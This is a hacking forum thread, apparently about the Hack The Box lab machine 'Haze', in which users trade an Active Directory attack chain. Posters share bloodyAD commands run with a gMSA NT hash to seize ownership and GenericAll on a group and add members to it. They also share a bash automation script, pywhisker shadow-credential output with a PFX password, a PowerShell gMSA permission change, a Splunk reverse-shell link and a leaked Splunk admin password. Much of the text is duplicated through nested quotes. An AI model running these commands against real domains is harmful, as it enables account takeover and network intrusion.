Posts: 3
Threads: 0
Joined: Jun 2024
Mar 30, 2025, 06:26 PM
(This post was last modified: Mar 30, 2025, 06:42 PM by Qwelybreachy.)
(Mar 30, 2025, 05:53 PM)GooseFountain82393 Wrote: (Mar 30, 2025, 04:48 PM)x1rx Wrote: (Mar 30, 2025, 04:37 PM)GooseFountain82393 Wrote: (Mar 30, 2025, 11:40 AM)Qwelybreachy Wrote: You can use it like this :
python3 bloodyAD.py --host "$machineIP"-d "haze.htb" -u 'Haze-IT-Backup$' -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 set owner 'SUPPORT_SERVICES' 'Haze-IT-Backup$'
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add genericAll "SUPPORT_SERVICES" "Haze-IT-Backup$"
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'mark.adams'
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'edward.martin'
After that, i don't know how to get edward.martin NTLM Hash to do a PTH using evil-winrm. I'm stuck.
You'll need Pywhisker and PKINIT after that.
It seems pywhisker isnt working for me , any idea ?
1 - owner edit - success
2 - genericall permission - success
3 - edward.martin added to group support_services - success
4 - (extra) mark.adams added to group support_services - success
but pywhiskers fails
bash exploit.sh 10.129.43.247
[*]Setting owner and permissions...
[*]Running: bloodyAD set owner SUPPORT_SERVICES Haze-IT-Backup$
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on SUPPORT_SERVICES
[*]Running: bloodyAD add genericAll SUPPORT_SERVICES Haze-IT-Backup$
[+] Haze-IT-Backup$ has now GenericAll on SUPPORT_SERVICES
[*]Adding users to group...
[*]Adding mark.adams to SUPPORT_SERVICES...
[*]Running: bloodyAD add groupMember SUPPORT_SERVICES mark.adams
[+] mark.adams added to SUPPORT_SERVICES
[*]Adding edward.martin to SUPPORT_SERVICES...
[*]Running: bloodyAD add groupMember SUPPORT_SERVICES edward.martin
[+] edward.martin added to SUPPORT_SERVICES
[*]Executing pywhisker actions...
[*]Adding mark.adams via pywhisker...
[*]Searching for the target account
[*]Target user found: CN=Mark Adams,CN=Users,DC=haze,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: 11b779bd-71a5-64d4-2f54-b912ccf9c79e
[*]Updating the msDS-KeyCredentialLink attribute of mark.adams
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
[*]Adding edward.martin via pywhisker...
[*]Searching for the target account
[*]Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: d5d7fa4b-7628-56c3-302c-778701bce5b4
[*]Updating the msDS-KeyCredentialLink attribute of edward.martin
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
[*]Script execution completed.
this is my script for all command in one script
#!/bin/bash
HOST="$1"
DOMAIN="haze.htb"
USER="Haze-IT-Backup$"
PASS=":735C02C6B2DC54C3C8C6891F55279EBC"
FORMAT="rc4"
GROUP="SUPPORT_SERVICES"
USERS=("mark.adams" "edward.martin")
log() {
echo "
[*]$1"
}
# Function to run bloodyAD commands
run_bloodyAD() {
log "Running: bloodyAD $*"
bloodyAD --host "$HOST" -d "$DOMAIN" -u "$USER" -p "$PASS" -f "$FORMAT" "$@"
echo
}
log "Setting owner and permissions..."
run_bloodyAD set owner "$GROUP" "$USER"
run_bloodyAD add genericAll "$GROUP" "$USER"
log "Adding users to group..."
for u in "${USERS[@]}"; do
log "Adding $u to $GROUP..."
run_bloodyAD add groupMember "$GROUP" "$u"
done
log "Executing pywhisker actions..."
for u in "${USERS[@]}"; do
log "Adding $u via pywhisker..."
pywhisker -d "$DOMAIN" -u "$USER" -H "$PASS" --target "$u" --action add
echo
done
log "Script execution completed."
[*]great work. You're almost there. The only difference is PyWhisker only wants the NTHASH, like this:
[*]
[*]python3 pywhisker.py -d haze.htb -u 'Haze-IT-Backup$' -H '735c02c6b2dc54c3c8c6891f55279ebc' --target 'edward.martin' --action "add"
[*]Searching for the target account
[*]Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: 50ae3ac9-448c-41b5-0098-3b7913be617c
[*]Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*]Converting PEM -> PFX with cryptography: srecZwEO.pfx
[+] PFX exportiert nach: srecZwEO.pfx
[i] Passwort für PFX: qM3EjnYvZ6RXIfSlUkZX
[+] Saved PFX (#PKCS12) certificate & key at path: srecZwEO.pfx
[*]Must be used with password: qM3EjnYvZ6RXIfSlUkZX
[*]A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
(Mar 30, 2025, 04:48 PM)x1rx Wrote: (Mar 30, 2025, 04:37 PM)GooseFountain82393 Wrote: (Mar 30, 2025, 11:40 AM)Qwelybreachy Wrote: You can use it like this :
python3 bloodyAD.py --host "$machineIP"-d "haze.htb" -u 'Haze-IT-Backup$' -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 set owner 'SUPPORT_SERVICES' 'Haze-IT-Backup$'
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add genericAll "SUPPORT_SERVICES" "Haze-IT-Backup$"
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'mark.adams'
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'edward.martin'
After that, i don't know how to get edward.martin NTLM Hash to do a PTH using evil-winrm. I'm stuck.
You'll need Pywhisker and PKINIT after that.
It seems pywhisker isnt working for me , any idea ?
1 - owner edit - success
2 - genericall permission - success
3 - edward.martin added to group support_services - success
4 - (extra) mark.adams added to group support_services - success
but pywhiskers fails
bash exploit.sh 10.129.43.247
[*]Setting owner and permissions...
[*]Running: bloodyAD set owner SUPPORT_SERVICES Haze-IT-Backup$
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on SUPPORT_SERVICES
[*]Running: bloodyAD add genericAll SUPPORT_SERVICES Haze-IT-Backup$
[+] Haze-IT-Backup$ has now GenericAll on SUPPORT_SERVICES
[*]Adding users to group...
[*]Adding mark.adams to SUPPORT_SERVICES...
[*]Running: bloodyAD add groupMember SUPPORT_SERVICES mark.adams
[+] mark.adams added to SUPPORT_SERVICES
[*]Adding edward.martin to SUPPORT_SERVICES...
[*]Running: bloodyAD add groupMember SUPPORT_SERVICES edward.martin
[+] edward.martin added to SUPPORT_SERVICES
[*]Executing pywhisker actions...
[*]Adding mark.adams via pywhisker...
[*]Searching for the target account
[*]Target user found: CN=Mark Adams,CN=Users,DC=haze,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: 11b779bd-71a5-64d4-2f54-b912ccf9c79e
[*]Updating the msDS-KeyCredentialLink attribute of mark.adams
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
[*]Adding edward.martin via pywhisker...
[*]Searching for the target account
[*]Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: d5d7fa4b-7628-56c3-302c-778701bce5b4
[*]Updating the msDS-KeyCredentialLink attribute of edward.martin
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
[*]Script execution completed.
this is my script for all command in one script
#!/bin/bash
HOST="$1"
DOMAIN="haze.htb"
USER="Haze-IT-Backup$"
PASS=":735C02C6B2DC54C3C8C6891F55279EBC"
FORMAT="rc4"
GROUP="SUPPORT_SERVICES"
USERS=("mark.adams" "edward.martin")
log() {
echo "
[*]$1"
}
# Function to run bloodyAD commands
run_bloodyAD() {
log "Running: bloodyAD $*"
bloodyAD --host "$HOST" -d "$DOMAIN" -u "$USER" -p "$PASS" -f "$FORMAT" "$@"
echo
}
log "Setting owner and permissions..."
run_bloodyAD set owner "$GROUP" "$USER"
run_bloodyAD add genericAll "$GROUP" "$USER"
log "Adding users to group..."
for u in "${USERS[@]}"; do
log "Adding $u to $GROUP..."
run_bloodyAD add groupMember "$GROUP" "$u"
done
log "Executing pywhisker actions..."
for u in "${USERS[@]}"; do
log "Adding $u via pywhisker..."
pywhisker -d "$DOMAIN" -u "$USER" -H "$PASS" --target "$u" --action add
echo
done
log "Script execution completed."
Ah - I spotted the error now. You need to add HAZE-IT-BACKUP to the Support_services group. Not Edward or Mark
bloodyAD --host "$IP" -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' add groupMember "SUPPORT_SERVICES" "Haze-IT-Backup$"
Ah, thank you so much — I hadn't noticed that error. I thought 'Haze-IT-Backup$' were already part of the group since I had set him as the owner with full control.
It worked much better, and I was able to use PKINITtools to finally understand how to get to the point of retrieving edward.martin's NT hash.
Posts: 7
Threads: 0
Joined: Feb 2025
(Mar 29, 2025, 10:39 PM)whaleflight Wrote: (Mar 29, 2025, 10:16 PM)kyakeiuwu Wrote: (Mar 29, 2025, 10:12 PM)pop10189 Wrote: (Mar 29, 2025, 10:05 PM)kyakeiuwu Wrote: (Mar 29, 2025, 09:55 PM)pop10189 Wrote: you can extract GMSA account hash, then that account can add owner to Support_Services group which i dont know tf i could do with this group
I was not able to do that. Can you tell how?
look for GMSA section https://notes.qazeer.io/active-directory...exploiting
Then extract the GMSA using netexec ldap -u mark... -p .... --gmsa
Account: Haze-IT-Backup$ NTLM:
I literally got this as the hash no NTLM
Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
$user = Get-ADUser -Identity "mark.adams"
Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword $user.DistinguishedName
then gMSADumper should work
Any idea on how to do this from Linux?
Posts: 17
Threads: 0
Joined: Jan 2025
the bloodyAD part doesn't work for me, throws invalid credentials...
Posts: 38
Threads: 1
Joined: Mar 2024
Mar 30, 2025, 10:08 PM
(This post was last modified: Mar 30, 2025, 10:31 PM by spamdegratis5.)
(Mar 30, 2025, 04:37 PM)GooseFountain82393 Wrote: (Mar 30, 2025, 11:40 AM)Qwelybreachy Wrote: You can use it like this :
python3 bloodyAD.py --host "$machineIP"-d "haze.htb" -u 'Haze-IT-Backup$' -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 set owner 'SUPPORT_SERVICES' 'Haze-IT-Backup$'
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add genericAll "SUPPORT_SERVICES" "Haze-IT-Backup$"
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'mark.adams'
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'edward.martin'
After that, i don't know how to get edward.martin NTLM Hash to do a PTH using evil-winrm. I'm stuck.
You'll need Pywhisker and PKINIT after that. Why? I don't see any permissions from Support_Services group that hints towards ShadowCredentials (bloodhound/powerview), could you elaborate? Thanks
Nvm, for some reason the outbound permission didn't appear. I collected again the domain information with haze-it-backup$ and now outbound permission showed.
Posts: 17
Threads: 0
Joined: Jan 2025
(Mar 30, 2025, 04:14 AM)rootme1122 Wrote: (Mar 30, 2025, 04:05 AM)zippo99 Wrote: (Mar 30, 2025, 01:32 AM)maggi Wrote: https://github.com/0xjpuff/reverse_shell_splunk
Then throw a potato at the box
yeah thats what I wanted to do, but how do you log into splunk? We don't have credentials that allow us to log in. We can only get the "Ld@p_Auth..." one from exploiting the LFI CVE. can't log into splunk with that one.
admin
Sp1unkadmin@2k24
how did y'all get this password? can't seem to find it anywhere...
Posts: 9
Threads: 0
Joined: Mar 2025
(Mar 30, 2025, 11:45 PM)arrogantoverlord Wrote: (Mar 30, 2025, 04:14 AM)rootme1122 Wrote: (Mar 30, 2025, 04:05 AM)zippo99 Wrote: (Mar 30, 2025, 01:32 AM)maggi Wrote: https://github.com/0xjpuff/reverse_shell_splunk
Then throw a potato at the box
yeah thats what I wanted to do, but how do you log into splunk? We don't have credentials that allow us to log in. We can only get the "Ld@p_Auth..." one from exploiting the LFI CVE. can't log into splunk with that one.
admin
Sp1unkadmin@2k24
how did y'all get this password? can't seem to find it anywhere...
I am stuck on the same problem. I have the admin password hash from the backup folder but I am not able to crack it/find the cleartext password somewhere
Posts: 70
Threads: 7
Joined: Jul 2024
(Mar 30, 2025, 05:53 PM)GooseFountain82393 Wrote: (Mar 30, 2025, 04:48 PM)x1rx Wrote: (Mar 30, 2025, 04:37 PM)GooseFountain82393 Wrote: (Mar 30, 2025, 11:40 AM)Qwelybreachy Wrote: You can use it like this :
python3 bloodyAD.py --host "$machineIP"-d "haze.htb" -u 'Haze-IT-Backup$' -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 set owner 'SUPPORT_SERVICES' 'Haze-IT-Backup$'
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add genericAll "SUPPORT_SERVICES" "Haze-IT-Backup$"
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'mark.adams'
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'edward.martin'
After that, i don't know how to get edward.martin NTLM Hash to do a PTH using evil-winrm. I'm stuck.
You'll need Pywhisker and PKINIT after that.
It seems pywhisker isnt working for me , any idea ?
1 - owner edit - success
2 - genericall permission - success
3 - edward.martin added to group support_services - success
4 - (extra) mark.adams added to group support_services - success
but pywhiskers fails
bash exploit.sh 10.129.43.247
[*]Setting owner and permissions...
[*]Running: bloodyAD set owner SUPPORT_SERVICES Haze-IT-Backup$
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on SUPPORT_SERVICES
[*]Running: bloodyAD add genericAll SUPPORT_SERVICES Haze-IT-Backup$
[+] Haze-IT-Backup$ has now GenericAll on SUPPORT_SERVICES
[*]Adding users to group...
[*]Adding mark.adams to SUPPORT_SERVICES...
[*]Running: bloodyAD add groupMember SUPPORT_SERVICES mark.adams
[+] mark.adams added to SUPPORT_SERVICES
[*]Adding edward.martin to SUPPORT_SERVICES...
[*]Running: bloodyAD add groupMember SUPPORT_SERVICES edward.martin
[+] edward.martin added to SUPPORT_SERVICES
[*]Executing pywhisker actions...
[*]Adding mark.adams via pywhisker...
[*]Searching for the target account
[*]Target user found: CN=Mark Adams,CN=Users,DC=haze,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: 11b779bd-71a5-64d4-2f54-b912ccf9c79e
[*]Updating the msDS-KeyCredentialLink attribute of mark.adams
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
[*]Adding edward.martin via pywhisker...
[*]Searching for the target account
[*]Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: d5d7fa4b-7628-56c3-302c-778701bce5b4
[*]Updating the msDS-KeyCredentialLink attribute of edward.martin
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
[*]Script execution completed.
this is my script for all command in one script
#!/bin/bash
HOST="$1"
DOMAIN="haze.htb"
USER="Haze-IT-Backup$"
PASS=":735C02C6B2DC54C3C8C6891F55279EBC"
FORMAT="rc4"
GROUP="SUPPORT_SERVICES"
USERS=("mark.adams" "edward.martin")
log() {
echo "
[*]$1"
}
# Function to run bloodyAD commands
run_bloodyAD() {
log "Running: bloodyAD $*"
bloodyAD --host "$HOST" -d "$DOMAIN" -u "$USER" -p "$PASS" -f "$FORMAT" "$@"
echo
}
log "Setting owner and permissions..."
run_bloodyAD set owner "$GROUP" "$USER"
run_bloodyAD add genericAll "$GROUP" "$USER"
log "Adding users to group..."
for u in "${USERS[@]}"; do
log "Adding $u to $GROUP..."
run_bloodyAD add groupMember "$GROUP" "$u"
done
log "Executing pywhisker actions..."
for u in "${USERS[@]}"; do
log "Adding $u via pywhisker..."
pywhisker -d "$DOMAIN" -u "$USER" -H "$PASS" --target "$u" --action add
echo
done
log "Script execution completed."
[*]great work. You're almost there. The only difference is PyWhisker only wants the NTHASH, like this:
[*]
[*]python3 pywhisker.py -d haze.htb -u 'Haze-IT-Backup$' -H '735c02c6b2dc54c3c8c6891f55279ebc' --target 'edward.martin' --action "add"
[*]Searching for the target account
[*]Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: 50ae3ac9-448c-41b5-0098-3b7913be617c
[*]Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*]Converting PEM -> PFX with cryptography: srecZwEO.pfx
[+] PFX exportiert nach: srecZwEO.pfx
[i] Passwort für PFX: qM3EjnYvZ6RXIfSlUkZX
[+] Saved PFX (#PKCS12) certificate & key at path: srecZwEO.pfx
[*]Must be used with password: qM3EjnYvZ6RXIfSlUkZX
[*]A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
(Mar 30, 2025, 04:48 PM)x1rx Wrote: (Mar 30, 2025, 04:37 PM)GooseFountain82393 Wrote: (Mar 30, 2025, 11:40 AM)Qwelybreachy Wrote: You can use it like this :
python3 bloodyAD.py --host "$machineIP"-d "haze.htb" -u 'Haze-IT-Backup$' -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 set owner 'SUPPORT_SERVICES' 'Haze-IT-Backup$'
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add genericAll "SUPPORT_SERVICES" "Haze-IT-Backup$"
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'mark.adams'
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'edward.martin'
After that, i don't know how to get edward.martin NTLM Hash to do a PTH using evil-winrm. I'm stuck.
You'll need Pywhisker and PKINIT after that.
It seems pywhisker isnt working for me , any idea ?
1 - owner edit - success
2 - genericall permission - success
3 - edward.martin added to group support_services - success
4 - (extra) mark.adams added to group support_services - success
but pywhiskers fails
bash exploit.sh 10.129.43.247
[*]Setting owner and permissions...
[*]Running: bloodyAD set owner SUPPORT_SERVICES Haze-IT-Backup$
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on SUPPORT_SERVICES
[*]Running: bloodyAD add genericAll SUPPORT_SERVICES Haze-IT-Backup$
[+] Haze-IT-Backup$ has now GenericAll on SUPPORT_SERVICES
[*]Adding users to group...
[*]Adding mark.adams to SUPPORT_SERVICES...
[*]Running: bloodyAD add groupMember SUPPORT_SERVICES mark.adams
[+] mark.adams added to SUPPORT_SERVICES
[*]Adding edward.martin to SUPPORT_SERVICES...
[*]Running: bloodyAD add groupMember SUPPORT_SERVICES edward.martin
[+] edward.martin added to SUPPORT_SERVICES
[*]Executing pywhisker actions...
[*]Adding mark.adams via pywhisker...
[*]Searching for the target account
[*]Target user found: CN=Mark Adams,CN=Users,DC=haze,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: 11b779bd-71a5-64d4-2f54-b912ccf9c79e
[*]Updating the msDS-KeyCredentialLink attribute of mark.adams
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
[*]Adding edward.martin via pywhisker...
[*]Searching for the target account
[*]Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: d5d7fa4b-7628-56c3-302c-778701bce5b4
[*]Updating the msDS-KeyCredentialLink attribute of edward.martin
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
[*]Script execution completed.
this is my script for all command in one script
#!/bin/bash
HOST="$1"
DOMAIN="haze.htb"
USER="Haze-IT-Backup$"
PASS=":735C02C6B2DC54C3C8C6891F55279EBC"
FORMAT="rc4"
GROUP="SUPPORT_SERVICES"
USERS=("mark.adams" "edward.martin")
log() {
echo "
[*]$1"
}
# Function to run bloodyAD commands
run_bloodyAD() {
log "Running: bloodyAD $*"
bloodyAD --host "$HOST" -d "$DOMAIN" -u "$USER" -p "$PASS" -f "$FORMAT" "$@"
echo
}
log "Setting owner and permissions..."
run_bloodyAD set owner "$GROUP" "$USER"
run_bloodyAD add genericAll "$GROUP" "$USER"
log "Adding users to group..."
for u in "${USERS[@]}"; do
log "Adding $u to $GROUP..."
run_bloodyAD add groupMember "$GROUP" "$u"
done
log "Executing pywhisker actions..."
for u in "${USERS[@]}"; do
log "Adding $u via pywhisker..."
pywhisker -d "$DOMAIN" -u "$USER" -H "$PASS" --target "$u" --action add
echo
done
log "Script execution completed."
Ah - I spotted the error now. You need to add HAZE-IT-BACKUP to the Support_services group. Not Edward or Mark
bloodyAD --host "$IP" -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' add groupMember "SUPPORT_SERVICES" "Haze-IT-Backup$"
thank you , adding Haze-IT-Backup$ and edward.martin to group worked
that is final script
#!/bin/bash
HOST="$1"
DOMAIN="haze.htb"
USER="Haze-IT-Backup$"
PASS=":735C02C6B2DC54C3C8C6891F55279EBC"
FORMAT="rc4"
GROUP="SUPPORT_SERVICES"
CONTROLLED_USER="Haze-IT-Backup$"
TARGET_USER="edward.martin"
log() {
echo "
[*]$1"
}
# Function to run bloodyAD commands
run_bloodyAD() {
log "Running: bloodyAD $*"
bloodyAD --host "$HOST" -d "$DOMAIN" -u "$USER" -p "$PASS" -f "$FORMAT" "$@"
echo
}
log "Setting owner and permissions..."
run_bloodyAD set owner "$GROUP" "$CONTROLLED_USER"
run_bloodyAD add genericAll "$GROUP" "$CONTROLLED_USER"
log "Adding users to group..."
log "Adding $TARGET_USER to $GROUP..."
run_bloodyAD add groupMember "$GROUP" "$TARGET_USER"
log "Adding $CONTROLLED_USER to $GROUP..."
run_bloodyAD add groupMember "$GROUP" "$CONTROLLED_USER"
log "Adding $TARGET_USER via pywhisker..."
pywhisker -d "$DOMAIN" -u "$USER" -H "$PASS" --target "$TARGET_USER" --action add
echo
log "Script execution completed."
Posts: 8
Threads: 1
Joined: Jan 2024
(Mar 31, 2025, 02:00 AM)dimly5252 Wrote: (Mar 30, 2025, 11:45 PM)arrogantoverlord Wrote: (Mar 30, 2025, 04:14 AM)rootme1122 Wrote: (Mar 30, 2025, 04:05 AM)zippo99 Wrote: (Mar 30, 2025, 01:32 AM)maggi Wrote: https://github.com/0xjpuff/reverse_shell_splunk
Then throw a potato at the box
yeah thats what I wanted to do, but how do you log into splunk? We don't have credentials that allow us to log in. We can only get the "Ld@p_Auth..." one from exploiting the LFI CVE. can't log into splunk with that one.
admin
Sp1unkadmin@2k24
how did y'all get this password? can't seem to find it anywhere...
I am stuck on the same problem. I have the admin password hash from the backup folder but I am not able to crack it/find the cleartext password somewhere
There's a splunk legacy password hash, and use the recovered splunk.secret to decrypt Splus
Posts: 9
Threads: 0
Joined: Mar 2025
(Mar 31, 2025, 03:35 AM)Axura Wrote: (Mar 31, 2025, 02:00 AM)dimly5252 Wrote: (Mar 30, 2025, 11:45 PM)arrogantoverlord Wrote: (Mar 30, 2025, 04:14 AM)rootme1122 Wrote: (Mar 30, 2025, 04:05 AM)zippo99 Wrote: yeah thats what I wanted to do, but how do you log into splunk? We don't have credentials that allow us to log in. We can only get the "Ld@p_Auth..." one from exploiting the LFI CVE. can't log into splunk with that one.
admin
Sp1unkadmin@2k24
how did y'all get this password? can't seem to find it anywhere...
I am stuck on the same problem. I have the admin password hash from the backup folder but I am not able to crack it/find the cleartext password somewhere
There's a splunk legacy password hash, and use the recovered splunk.secret to decryptSplus Do you mean that there is a legacy hash in the Backups or there is a legacy hash in the current production environment (Besides the binddn hash)?
Posts: 5
Threads: 1
Joined: Sep 2024
Can someone post an explaination for getting edward martin? I dont get it why are you using pywhisker and what made yall think you should use it?
|
